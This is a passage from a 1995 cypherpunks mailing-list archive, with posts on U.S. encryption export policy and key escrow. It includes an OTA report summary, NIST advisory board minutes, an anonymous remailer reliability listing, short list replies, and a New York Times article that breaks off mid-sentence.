> grown over the past two decades, but are still developing.
> Research is international; markets would be, says OTA,
> except for governmental restrictions, such as export
> controls that effectively create "domestic" and "export"
> market segments for strong encryption products.
> 
> Cryptography policies affect technological developments in
> the field, as well as the health and economic vitality of
> companies that produce or use products incorporating
> cryptography, and consequently, the vitality of the
> information technology industries and the everyday lives of
> most Americans.  But, business has strong and serious
> concerns that government interests, especially with respect
> to standards and export controls, could stifle commercial
> development and use of networks in the international arena.
> Given the broad public and business impacts, timely and
> continuing congressional oversight of these policies is
> crucial.
> 
> Strong encryption is increasingly portrayed as a threat to
> domestic security (public safety) and a barrier to law
> enforcement if it is readily available for use by terrorists
> or criminals.  Thus, export controls, intended to restrict
> the international availability of U.S. cryptography
> technology and products, are now being joined with domestic
> cryptography initiatives, like key-escrow encryption, that
> are intended to preserve U.S. law-enforcement and signals-
> intelligence capabilities.
> 
> Public and business concerns surrounding the Clinton
> Administration's escrowed-encryption initiative have not
> been resolved, notes OTA.  Many concerns focus on whether
> government-approved, key-escrow encryption will become
> mandatory for government agencies or the private sector, if
> non-escrowed encryption will be banned, and/or if  these
> actions could be taken without legislation. Although the
> Clinton Administration has stated that it has no plans to
> make escrowed encryption mandatory, or to ban other forms of
> encryption, OTA points out that, absent legislation, these
> intentions are not binding.  OTA concludes that escrowed-
> encryption initiatives warrant congressional attention
> because of the public funds that will be spent in deploying
> them, and also because negative public perceptions of the
> processes for developing and deploying encryption standards,
> and of the standards themselves, may erode public confidence
> and trust in government and the effectiveness of federal
> leadership in promoting responsible use of information
> safeguards.
> 
> OTA is a nonpartisan analytical agency that serves the U.S.
> Congress.  Its purpose is to aid Congress with the complex
> and often highly technical issues that increasingly affect
> our society.
> 
> ORDERING INFORMATION
> 
> For copies of the 142-page background paper "Issue Update on
> Information Security and Privacy in Network Environments"
> for congressional use, please call (202) 224-9241.  To order
> copies for noncongressional use, call (202) 512-0132 (GPO's
> main bookstore) or (202) 512-1800 and indicate stock number
> 052-003-01416-5.  Or send your check for $11.00 a copy or
> provide your VISA or MasterCard number and expiration date
> to Superintendent of Documents, P.O. Box 371954, Pittsburgh,
> PA 15250-7974, [FAX (202) 512-2250].  Free 8-page summaries
> are available electronically, and by calling (202) 224-8996.
> 
> ELECTRONIC ACCESS
> 
> Readers can access this background paper electronically
> through OTA Online via the following standard Internet
> tools:
> 
> WWW: http://www.ota.gov
> 
> FTP: otabbs.ota.gov; login as anonymous, password is your e-
> mail address; publications are in the /pub directory
> 
> Telnet: otabbs.ota.gov; login as public, password is public
> 
> Additional features of OTA Online are available through
> client software with a graphical user interface for
> Microsoft Windows.  This software is available free through
> the WWW home page or by contacting the OTA
> Telecommunications and Information Systems Office, (202)
> 228-6000, or email sysop@ota.gov  Direct questions or
> comments on Internet services by email to netsupport@ota.gov
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 11 Sep 95 02:48:08 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Digital Fingerprinting
In-Reply-To: <ac78f5a804021004b64e@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950911054528.26534B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 10 Sep 1995, Timothy C. May wrote:

> If a piece of mail addressed to me is found littering the highway, can I be
> convicted of littering? No, because the _provenance_ of that item of mail
> cannot be determined...it might have accidentally blown out of a trash
> truch delivering my mail to the dump, for example.

I'm afraid that they are busting people in New York for recycling 
violations when they find mail addressed to them mixed in with household 
garbage in public trash cans.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael S Baum <baum@world.std.com>
Date: Mon, 11 Sep 95 03:44:17 PDT
To: cypherpunks@toad.com
Subject: FYI
Message-ID: <Pine.3.89.9509110644.F5144-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 21:50:18 PDT
To: cypherpunks@toad.com
Subject: GAK Advisory Board
Message-ID: <199509110450.GAA02109@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>From URL: http://csrc.ncsl.nist.gov/csspab/minutes.395


    Minutes of the March 22-23, 1995 Meeting of the
  Computer System Security and Privacy Advisory Board

Wednesday, March 22, 1995

Introduction

A quorum being present, the Chairman, Dr. Willis Ware,
called the meeting to order at 9:00 a.m. at the Holiday
Inn, Gaithersburg, Maryland.  Besides Dr. Ware, the
following Board members were present:  Charlie Baggett
Jr., Genevieve Burns, Cris Castro, Don Gangemi, Sandra
Lambert, Henry Philcox, Randy Sanovic, Stephen Trodden,
Steve Walker [TIS], and Bill Whitehurst [IBM].

[Snip long section on security assurance standards and
methods in US, Canada and UK.]

Update on X/Open Branding Project

Mr. Bill Whitehurst, IBM, gave a brief update of the
activities of the X/Open Branding Project.

Two major components exist within their branding concept:
(1) the ability to implement functionality based on a
minimum set of assurance functionality requirements
(MSFR), and (2) the confidence in the development process
for achieving the functionality.

He said that the workgroup meeting, hosted by Hewlett
Packard, was held early in March.  The group plans to
re-write their document to include some type of
evaluation process prior to the vendor product getting
branded.  X/Open plans to have a public review of the
changes this summer.


Vendor Perspective

Ms. Linda Vetter, Oracle Corporation, presented oracle's
views of security assurance.  She discussed three types
of assurance issues: (1) governent evaluation and
certification; (2) third party evaluation and
certification (government and business sponsored); and
(3) vendor claims.

Ms. Vetter explained Oracle s evaluation experience for
two DBMS server product s, Oracle7 and Trusted Oracle7,
in both the US and the UK.  Oracle used the US TCSEC TPEP
evaluation for B1 and C2 systems.  They also used the UK
ITSEC evaluation for E3 systems (which is the equivalent
for US B1 and C2 systems).  The UK process took
significantly less time and cost less money for an
identical product.  Ms. Vetter suggested that NIST/NSA
look into developing equivalent/comparable trust levels
between the two different evaluation criteria methods as
well as those for other countries.  This would minimize
the need to have different evaluations performed (one for
each country) for the same product.

Oracle has on-going work in other areas (e.g., RAMP, CMM,
ISO, and Audits) as well as multiple CLEFS with the UK,
Sweden, France and Germany.  Ms. Vetter explained the
differences in criteria between the TCSEC and the ITSEC. 
She said that the ITSEC requirements for the content of
evaluation deliverables formed a superset of the
corresponding TCSEC requirements for the evaluations. 
However, the TCSEC creates a framework for the
presentation of these requirements and there can be
little deviation from this.

Oracle would like to see more concentration on low-end
assurance requirements and processes.  This would enable
various sectors like health care, banking, and financial
industries to have protection for unclasified to
sensitive data.  Ms. Vetter encouraged NSA to continue
its efforts in modeling (Common Assurance Framework,
TCMM, and SE CMM) and would discourage any more efforts
in product profiling.  The modeling efforts encourage
vendor quality improvement, promotes flexibility in
meeting assurance objectives, and are transferable to
other private sector domains besides DoD.  (See Reference
#8).


Wrap-up and Restatement of Issues

Dr. Katzke summarized the discussion of assurance by
saying that opportunities exist to look at alternatives. 
He is not sure what the government's role is or which
areas to concentrate on with respect to cost.  He said
that he could continue with the same level of effort that
is going on now with community involvement.  He is open
to suggestions with regard to the assurance process.


Discussion

After a lengthy discussion on the state of the Common
Criteria (CC) and assurance approaches and issues, some
of the major points from individual Board members
included:

-  Concern as to when the CC will be widely accepted and
   used;

-  Whether to adopt the ITSEC now and migrate to CC;

-  The need to simplify the CC;

-  Building assurance and quality into the new assurance
   framework;

-  Clearly define assurance needs to be universally
   understood;

-  Conduct more C2 and below evaluations in the US;

-  Concentrate on low-end assurance; and

-  Bring key industry players into the process.

[Snip]

Board members continued their discussion of criteria and
assurance from the previous day.  Some of the major
points of the discussion from Board members included the
need:

-  for OMB to state the need for C2 level evaluation
   compliance for various government product purchases;

-  for NSA to make a statement about equivalency among
   all existing non-US trust levels;

-  to begin using components of the Common Criteria and
   gradually migrate to it;

-  to continue a wide range of assurance framework
   options and procedures; and

-  to focus on low-end assurance methods and encourage C2
   level evaluation along the following Canadian AL-1
   evaluation.

[Snip]


Status of Key Escrow Initiative

Mr. Steve Walker, Trusted Information Systems (TIS),
briefed the Board on the status of Commercial Key Escrow
(CKE).  He said, with regard to application vendors, TIS
is actively seeking the participation of commercial
software vendors in widespread implementation of CKE
enabled software products.  TIS has installed a Data
Recovery Center (DRC) on the Internet and is prepared to
distribute sample DRC application software packages to
any interested software application developer.  TIS is
seeking approval of the US government for export of
application programs using encryption algorithms such as
the Data Encryption Standard (DES) when properly bound
with CKE.

Mr. Walker said the advantages of CKE for government
interests is that if the TIS CKE system were to become
widely used throughout the private sector and government
communities, law enforcement, national security and
private sector interests would be preserved.

Mr. Walker said that TIS has filed for patent protection
for its Software Key Escrow (Clipper equivalent) and CKE
systems including the DRC and application software
approaches.  TIS is prepared to license its CKE system
and software applications technology to any software or
hardware vendor under very favorable licensing terms. 
TIS is also prepared to license its DRC system and
technology to qualified DRC operators and vendors under
similarly favorable licensing terms.  (See Reference
#13).

[Snip]

----------

>From URL: http://csrc.ncsl.nist.gov/csspab/csspab.txt


            National Computer System Security
                and Privacy Advisory Board


Identifying Emerging Computer Security Issues

What is the Computer System Security and Privacy Advisory
Board (CSSPAB)?

Congress established the CSSPAB as a public advisory
board in the Computer Security Act of 1987.  The Board is
composed of twelve members, in addition to the
Chairperson, who are recognized experts in the fields of
computer and telecommunications systems security and
technology.

What is the Board's purpose?

The Computer Security Act specifies that the Board's
mission is to identify emerging managerial, technical,
administrative, and physical safeguard issues relative to
computer systems security and privacy.

What is the scope of the Board's authority?

The Board examines those issues affecting the security
and privacy of sensitive unclassified information in
federal computer and telecommunications systems.  The
Board's authority does not extend to private-sector
systems or federal systems which process classified
information.

What are the board's advisory and reporting functions?

The Board advises the Secretary of Commerce and the
Director of the National Institute of Standards and
Technology (NIST) on computer security and privacy issues
pertaining to sensitive unclassified information stored
or processed by federal computer systems. The Board
reports its findings to the Secretary of Commerce, the
Director of the Office of Management and Budget, the
Director of the National Security Agency, and appropriate
committees of Congress.

How often and where does the Board meet?

The Board holds its two-day meetings twice per year;
however, additional meetings may be called at the
Chairperson's discretion. Board meetings are held in the
Washington, DC metropolitan area as well as other areas
in which there is significant federal computer security
interest and activity.

Are Board meetings open to the public?

In accordance with the Federal Advisory Committee and
Government in Sunshine acts, Board meetings are announced
in the Federal Register and are normally open to the
public.  The Board accepts written statements from the
public (see address on reverse).

How is CSSPAB membership determined?

The Director of NIST of the Department of Commerce
appoints Board members for four-year terms.  By law, the
membership of the Board is distributed as follows:

-  Four experts from outside of federal government, one
   whom is representative of small- or medium-size firm;

-  Four non-government employees who are not employed by
   or a representative of a producer of computer or
   telecommunications equipment; and

-  Four members from the federal government, including
   one from the National Security Agency of the
   Department of Defense.

Nominations to fill vacancies on the Board may be
submitted to the Director of NIST.
NIST personnel serve as the Board's Secretariat.  Other
federal agency personnel may also assist the Board's
activities as specified in the Computer Security Act of
1987.

Are Board members paid for their service?

Board members do not receive a salary or stipend;
however, authorized travel expenses are reimbursed as
specified by Congress.

*******************************************************

For further information, please contact:

Computer System Security and Privacy Advisory Board

Executive Secretariat

National Computer Systems Laboratory
Technology Building, Room B-154
National Institute of Standards and Technology
Gaithersburg, MD  20899 













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 11 Sep 95 06:50:45 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509111350.GAA28685@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: penet is *down* for a few days. Check back here for updates.

Last ping: Mon 11 Sep 95 4:00:27 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           *--****+**+*     9:23  99.99%
hacktic  remailer@utopia.hacktic.nl       *****+****+*    12:51  99.99%
hroller  hroller@c2.org                   **********+*     7:48  99.99%
syrinx   syrinx@c2.org                    ------++-++*  1:16:52  99.99%
c2       remail@c2.org                    +++++++++++*    39:22  99.99%
flame    remailer@flame.alias.net         ++++++*-+*+*  1:20:26  99.99%
spook    remailer@spook.alias.net         --.--+-----   3:55:18  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***-******+*    13:02  99.98%
replay   remailer@replay.com              *****+****+*    15:04  99.93%
ideath   remailer@ideath.goldenbear.com   ----.---+---  3:51:00  99.83%
ncognito ncognito@gate.net                * ** ****++*     7:04  99.08%
rmadillo remailer@armadillo.com           ++ + *+++*++    54:25  99.06%
precip   mixmaster@mix.precipice.com                      52:55  99.07%
ford     remailer@bi-node.zerberus.de     **********+*     5:54  98.82%
crown    mixmaster@kether.alias.net       -- ---+--+--  3:32:46  98.04%
extropia remail@extropia.wimsey.com       _---.- -..-  12:48:37  97.01%
portal   hfinney@shell.portal.com         ****  *+ *+*     5:57  96.81%
vishnu   mixmaster@vishnu.alias.net        ---------+*  4:59:22  96.27%
robo     robo@c2.org                      **********+*    11:03  95.95%
rahul    homer@rahul.net                  +*+*******+*     6:52  99.99%
gondolin mixmaster@gondolin.org           -- . -+*--.   6:29:14  89.70%
mix      mixmaster@remail.obscura.com     ---+---___.  15:25:37  87.63%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Mon, 11 Sep 95 04:03:33 PDT
To: hal9001@panix.com (Robert A. Rosenberg)
Subject: Re: Internet commerce mtg, Denver
In-Reply-To: <v02130500ac78bfb2b964@[166.84.254.3]>
Message-ID: <199509111101.HAA12452@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> I see nothing wrong with doing something similar with Phone Books (and I
> seem to remember reading that has been done in the past).

More than that it is completely legal (to type in such a book).

Now back to cypherpunk topics

/hawk
-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 23:00:20 PDT
To: cypherpunks@toad.com
Subject: GAK Advisory Board 94
Message-ID: <199509110600.IAA03045@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>From URL: http://csrc.ncsl.nist.gov/csspab/94-rpt.txt


                   Executive Summary

This Annual Report documents activities of the National
Computer System Security and Privacy Advisory Board
during 1994, its sixth year.

During the year, the Board continued to review
cryptography related issues.  During 1994, the
Escrowed Encryption Standard (EES) and the Digital
Signature Standard (DSS) were approved as Federal
Information Processing Standards (FIPS 185) and (FIPS
186) respectively.  The Board heard briefings on
escrowing release procedures, escrow program procedures,
U.S. export procedures, international cryptography
proposals, international corporate key escrow,
alternative key escrow approaches, and software-based key
escrow encryption.

The Board also continued to follow activities related to
the Common Criteria (CC), which remains in draft form. 
[Comments on the CC will be reviewed and processed in
March 1995.] The Board continued to examine the
question as to whether there is a business case for
setting up a Trusted Technology Assessment Program
(TTAP).


Membership

Currently, Dr. Willis H. Ware, a senior researcher of the
Corporate Research Staff of RAND, serves as Chairman of
the Board.  He was appointed in July 1989.  As of
December 1994, the membership of the Board is as follows:

-  Chairman
   Willis H. Ware, RAND

-  Federal Members
   Charlie C. Baggett, Jr. National Security Agency
   Henry H. Philcox, Department of the Treasury, Internal
      Revenue Service
   Cynthia C. Rand, Department of Transportation
   Stephen A. Trodden, Department of Veterans Affairs

-  Non-Federal, Non-Vendor
   Genevieve M. Burns, Monsanto Corporation (Member
      Designate)
   Cris R. Castro, KPMG Peat Marwick
   Sandra Lambert, Citibank
   Randolph Sanovic, Mobil Corporation (Member Designate)

-  Non-Federal, Vendor
   Gaetano Gangemi, Wang Laboratories, Inc.
   Linda Vetter, Oracle Corporation (Member Designate)
   Stephen T. Walker, Trusted Information Systems, Inc.
   Bill Whitehurst, International Business Machines Corp.

In December of 1994, Ms. Cynthia Rand resigned from the
Board, leaving a vacancy in the federal member category.


              II. Major Issues Discussed

The work of the Board during 1994 was devoted to various
topics related to security of federal unclassified
automated information systems.  Among the most important
were:

-  Cryptographic Key Escrowing Procedures

-  Alternative Key Escrow

-  Security in the National Information Infrastructure
   (NII)

Escrowing Release/Program Procedures

The Department of Justice briefed the Board on procedures
for release of cryptographic key components, by the two
escrow agents, to government agencies.  The two escrow
agents at the National Institute of Standards and
Technology (NIST), of the Department of Commerce and the
Automated Systems Division of the Department of Treasury. 
The agents act under strict procedures to ensure the
security of the key components and which govern their
release for use in conjunction with lawful wiretaps.

NIST discussed the procedures for the key escrow program. 
Five federal agencies share a role in the key escrow
program:  (1) the Department of Justice is a sponsor and
a family key agent that holds one of the components of
the family key, (2) the Federal Bureau of Investigation
is the initial law enforcement user and a family key
agent that holds the other component of the family key,
(3) NIST has a dual role as the program manager and a key
escrow agent, (4) the Department of Treasury is a key
escrow agent; and (5) the National Security Agency
is the system developer that provides technical
assistance.


Alternative Key Escrow

Bankers Trust presented some rationales for key escrow
encryption for corporations, which fulfills management
supervision and compliance duties, and reduces business
risks.  They maintain that the Bankers Trust system can
meet both U.S. and European needs.  Their system has been
discussed with Canada, Britain, France, Singapore, and
the U.S.; however, none of these countries have
endorsed the system.

Trusted Information Systems, Inc. gave a demonstration
and overview of their approach to software-based key
escrow encryption.  They said that software key escrow
systems could be built that meet the objectives of law
enforcement.  Also, that variations of their software key
escrow system can provide a commercial key escrow
capability that will be very appealing to corporate and
individual computer users.  They believe that widespread
use of corporate key escrow, in which corporations
operate their own key escrow centers, and individual key
escrow, in which bonded commercial key escrow centers
provide a key retrieval capability for registered users,
will better achieve the key escrow objectives of law
enforcement than a government-operated key escrow
system.


[Snip 180kb of very informative docs on the main US
cryptography issues of 1994, still alive in '95.]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Mon, 11 Sep 95 08:27:50 PDT
To: cypherpunks@toad.com
Subject: Clipper: the definitive meme
Message-ID: <199509111526.IAA17504@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



T-shirt!!  T-shirt!!

	Jim Gillogly
	Trewesday, 20 Halimath S.R. 1995, 15:26

------- Forwarded Message

From: wtshaw@aol.com (WTShaw)
Newsgroups: talk.politics.crypto
Subject: Re: Impressions of the NIST meeting
Date: 11 Sep 1995 04:50:27 -0400

In the world of Jet-Age crypto, the government offers up a biplane, and
seek to reserve the second seat for themselves.

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 11 Sep 95 05:57:18 PDT
To: cypherpunks@toad.com
Subject: Media coverage of NIST Export meetings?
Message-ID: <32173.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone seen any media coverage of last week's meetings?
I haven't seen anything in either the Washington Post or
the Wall Street Journal. Nothing on radio or local TV either.

I don't expect much coverage, as Joe Sixpack has no knowledge of
why he should be interested. But I expected at least a paragraph
hidden somewhere inside.  Perhaps I missed it.

Anyone else seen any???

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 11 Sep 95 06:03:18 PDT
To: "Thaddeus J. Beier" <thad@hammerhead.com>
Subject: Re: 64 bit crypto
In-Reply-To: <199509110157.SAA01073@hammerhead.com>
Message-ID: <Pine.SUN.3.91.950911090108.24478A-100000@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Sep 1995, Thaddeus J. Beier wrote:

> Forgive a little bit of code...

Hey. It's C. That's what this mailing list is about, right? ;-)

> 		for(i = 0; i < 65536) {	/* stir the pot a long time */

                for (i = 0; i < 65536; i++) { /* stir the pot a long time */

Otherwise the loop will run a *long* time. Like infinity. :-)
--
Michael Handler <grendel@netaxs.com> Philadelphia, PA
Cypherpunks: Civil Liberty Through Complex Mathematics

                                            better living through cryptography




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 11 Sep 95 06:05:20 PDT
To: cypherpunks@toad.com
Subject: Cryptography Technical Report Server: Bad URL
Message-ID: <199509111304.JAA04118@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


My previous post about the Cryptography Technical Report Server (CTRS)
contained a bad URL, so some of you who tried to access it recently
weren't able to find it.  My apologies.

The problem has been fixed, though, so CTRS can now *really* be found at

		    <http://www.itribe.net/CTRS/>
				  or
		    <https://www.itribe.net/CTRS/>

We're upgrading our SPARC Webserver to a spiffy new Challenge-S, so
not only should you now have no problem finding CTRS, but it should
also respond pretty quickly.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Sep 95 06:17:00 PDT
To: cypherpunks@toad.com
Subject: NYT on GAK
Message-ID: <199509111316.JAA02859@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, September 11, 1995, p. D7.


   Technology / Peter H. Lewis

   On The Net. Privacy for computers? Clinton sets the stage
   for a debate on data encryption.


   In terms of its ability to raise the nation's blood
   pressure, the debate over data encryption has not yet
   reached the same levels as gun control.

   But last week the Clinton Administration appeared to set
   the stage for an equally divisive debate over the degree to
   which businesses and individuals have the right to keep
   secrets when using telephones, computers and other forms of
   electronic communications.

   In two days of public hearings last week in Gaithersburg,
   Md., home of the National Institute of Standards and
   Technology, the Administration introduced its long-awaited
   proposals to relax restrictions on the export of
   cryptographic software.

   The Administration drew a line in the virtual sands of
   cyberspace, signaling that it is willing to permit
   Americans to put stronger cryptographic locks on their
   electronic data only if a spare key to those locks is made
   available on demand to law-enforcement agencies.

   There looms the conflict. Although the debate is about
   export controls the "export" issue is irrelevant in today's
   era of global electronic networks. Placing a common privacy
   program on an Internet computer in Austin, Tex., is
   effectively no different from sending a shrink-wrapped copy
   of the program to Moscow.

   The real issue is how much privacy the Government is
   willing to allow its own citizens, and the latest word from
   the Clinton Administration is that the right to electronic
   privacy, like the right to bear arms, is not absolute.

   Cryptography is the science of secret writing. In this
   digital era, it applies not just to notes, but also to
   telephone calls, money transfers, bank and credit card
   records, electronic mail, faxes and other computer files.

   The Clinton Administration's goal is to allow Americans to
   use the strongest possible cryptographic technology, while
   at the same time preserving the ability of law-enforcement
   agencies to perform court-authorized wiretaps as part of
   the effort to catch drug dealers, terrorists, child
   pornographers and other miscreants.
             
   In other words, it favors strong cryptography, but not too
   strong.

   The strength of cryptographic software is measured by the
   length of the software key necessary to encode and decode
   a message. The longer the key, the harder it is for an
   unauthorized user to decipher the message.

   In recent years, the Government has generally permitted
   Americans to export cryptographic software with key lengths
   up to 40 bits. Experts say that 40-bit keys are secure from
   casual snooping, but will fall quickly to a determined
   codebreaker.

   Last week, after more than a year of intense analysis, the
   Government introduced what it said was the best possible
   compromise.

   Under the new policy, companies can export encryption
   algorithms using 64-bit keys, which are much more secure,
   but only if spare keys are given to "escrow agents" who
   would make them available to lawenforcement agents under
   standard legal procedures, similar to legal wiretaps
   authorized by a judge. Otherwise, the 40-bit limit
   continues to apply.

   Such a "key escrow" scheme is anathema to many privacy
   advocates who fear Government abuses. The Government first
   proposed a key escrow system with its so-called Clipper
   Chip, a technology that failed to win acceptance even as a
   voluntary standard.

   The new scheme is somewhat more palatable than Clipper. Key
   escrow is still unpopular with American computer and
   software companies, which say it prevents them from
   competing against foreign companies that have no similar
   constraints, and with many multinational corporations,
   which say it prevents them from working with foreign
   companies that do not especially care for the idea of Uncle
   Sam holding the keys to their data banks.

   "If this was intended to be any sort of compromise, I don't
   think it achieved its end," said Whitfield Diffie, a Sun
   Microsystems enginePs who attended the meetings. "I didn't
   see anybody who was enthusiastic."

   Raymond G. Kammer, deputy director of N.l.S.T., suggested
   that the hearings last week were intended to elicit public
   comment, and that the Administration's final position on
   cryptographic policy were still under analysis.

   But the emergence of key escrow issues at the N.l.S.T.
   proceedings suggests that key escrow is emerging as a
   nonnegotiable demand by some factions of the Clinton
   Administration, especially the Justice Department and the
   Federal Bureau of Investigation, led by Louis Freeh.

   "If this fails," said a figure familiar with the
   Administration's thinking on the proposed change in
   cryptographic policy, "it's going to lead to a very
   divisive debate. And the irony, for libertarians who oppose
   key escrow, is that if it fails, I am convinced that Louis
   Freeh cannot be true to his job without proposing domestic
   controls on data encryption."

   "He's not going to give up without a fight, and neither is
   the Justice Department," said the figure, who spoke on the
   condition he not be identified.

   Others say they do not think the Clinton Administration has
   yet arrived at a concrete position, even after more than a
   year of study and debate. "I don't think it's a final
   offer," said John Gilmore, an engineer at Cygnus Support,
   a computer company in Mountain View, Calif. "It looks to me
   like a weak strawman, a first offer, a proposal to dance."

   The question is whether American citizens and businesses
   have the patience to wait for the music to start. And the
   issue may be moot, anyway because the Internet is no more
   controlled by the United States than is the United Nations.

   "The Internet Architecture Board has specifically decided
   to ignore export controls in designing the security
   infrastructure for the next generation of Internet
   protocols," Mr. Gilmore said. "The Internet of 1998 will
   provide automatic, secure, and fully private communication,
   without key escrow, internationally."

   In other words, the Internet community is already planning
   to jump over the new line in the sand drawn last week by
   the Administration. Cryptogrophy that is stronger than the
